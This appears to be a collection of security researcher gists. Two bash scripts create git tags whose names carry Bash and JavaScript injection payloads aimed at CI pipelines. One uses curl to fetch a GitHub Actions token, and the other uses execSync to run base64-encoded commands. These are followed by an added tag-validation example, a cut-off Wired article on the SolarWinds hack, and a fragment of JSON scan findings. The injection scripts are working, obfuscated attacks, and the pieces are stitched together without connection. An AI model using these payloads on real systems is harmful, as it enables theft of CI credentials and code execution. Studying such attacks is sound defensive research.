François Proulx fproulx-boostsecurity
fproulx-boostsecurity / malicious-bash-in-git-tag.sh
Last active July 4, 2024 20:59
Maliciously crafted Git tag (Bash injection)
#!/bin/bash
#set -x
git commit --allow-empty -m 'New release'
RND_SEMVER="v1.3.$((RANDOM % 1000))"
git tag $RND_SEMVER'$('\
'S="$(echo${IFS}-n${IFS}IA==|base64${IFS}--decode)";'\
'C="$(echo${IFS}-n${IFS}Og==|base64${IFS}--decode)";'\
'curl${IFS}'\
'-H"Authorization${C}${S}bearer${S}$ACTIONS_ID_TOKEN_REQUEST_TOKEN"${IFS}'\
'"$ACTIONS_ID_TOKEN_REQUEST_URL"'\
fproulx-boostsecurity / malicious-js-in-git-tag.sh
Last active March 15, 2024 19:22
Maliciously crafted Git tag (Javascript injection)
#!/bin/bash
#set -x
git commit --allow-empty -m 'New release'
RND_SEMVER="v1.2.$((RANDOM % 1000))"
S2='env; aws --version'
ENC_S2=$(echo -n "$S2" | base64)
S1="'+require('child_process').execSync(atob('$ENC_S2')).toString()+'"
git tag "${RND_SEMVER}${S1}"
FINAL_TAG=$(git describe --tags --exact-match)
git push origin "$FINAL_TAG"
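Both gists above rely on a CI job splicing the tag name into a shell or JavaScript step as code. The check below is an added example, not code from the gists or from the author: it allow-lists a release tag as exactly "vMAJOR.MINOR.PATCH" before the name is used anywhere, and fails closed otherwise. Function names and sample tags are constructed for this example.

```shell
#!/bin/sh
# Added example (not from the gists): CI-side allow-list check of a release tag
# before its name is used in any shell or JavaScript step.

# Returns 0 only for a plain semver tag such as v1.3.42. The anchored pattern
# leaves no room for the "$(...)" or "'+require(...)+'" suffixes the gists
# append, nor for ';', '`', quotes or whitespace.
validate_release_tag() {
  tag=$1
  nl='
'
  # grep matches line by line, so an embedded newline could hide a second line
  # from the anchored pattern; reject it explicitly.
  case "$tag" in *"$nl"*) return 1 ;; esac
  printf '%s' "$tag" | grep -Eq '^v[0-9]+\.[0-9]+\.[0-9]+$'
}

# Prints the tag and returns 0 when it passes validation; otherwise prints a
# diagnostic on stderr, nothing on stdout, and returns 1 so the job fails closed.
safe_release_tag() {
  if validate_release_tag "$1"; then
    printf '%s\n' "$1"
    return 0
  fi
  printf 'refusing release tag with unexpected characters\n' >&2
  return 1
}

# Typical use in a job: read the tag from an environment variable the workflow
# sets (never splice it into the script text), then stop if it is rejected.
# RELEASE_TAG="v1.3.42"; TAG=$(safe_release_tag "$RELEASE_TAG") || exit 1
```

In GitHub Actions, pass the tag through `env:` and reference it as a quoted `"$RELEASE_TAG"` inside `run:` rather than writing the `${{ ... }}` expression into the script body, so the tag reaches the shell as data instead of code.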
fproulx-boostsecurity / wired-solarwinds.md
Created August 1, 2023 19:32
Wired - The Untold Story of the Boldest Supply-Chain Hack Ever

The Untold Story of the Boldest Supply-Chain Hack Ever

The attackers were in thousands of corporate and government networks. They might still be there now. Behind the scenes of the SolarWinds investigation.

By Kim Zetter, May 2, 2023, 6:00 AM

Steven Adair wasn’t too rattled at first.

It was late 2019, and Adair, the president of the security firm Volexity, was investigating a digital security breach at an American think tank. The intrusion was nothing special. Adair figured he and his team would rout the attackers quickly and be done with the case—until they noticed something strange. A second group of hackers was active in the think tank’s network. They were going after email, making copies and sending them to an outside server. These intruders were much more skilled, and they were returning to the network several times a week to siphon correspondence from specific executives, policy wonks, and IT staff.

Adair and his colleagues dubbed the second gang of thieves “Dark Halo” and booted them from the netw

{
"data": [{
"injection": {
"findings": [{
"location": "github.com/myorg/a/aaa.py",
"startLineNumber": "1",
"endLineNumber": "2",
"type": "sql-injection"
},